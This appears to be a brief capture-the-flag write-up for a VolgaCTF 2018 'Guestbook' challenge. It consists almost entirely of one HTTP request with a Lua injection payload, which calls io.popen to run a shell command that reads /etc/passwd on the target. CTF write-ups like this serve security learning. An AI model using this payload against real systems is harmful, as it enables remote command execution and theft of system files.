Rating: 1.0

# Guestbook Writeup

Lua Injection

```
GET /search?search="..(io.popen('cat\x20/etc/passwd','r'):read('*a')).." HTTP/1.1
Host: guestbook.quals.2018.volgactf.ru
```

Original writeup (https://github.com/BlackFan/ctfs/tree/master/volgactf_2018_quals/guestbook).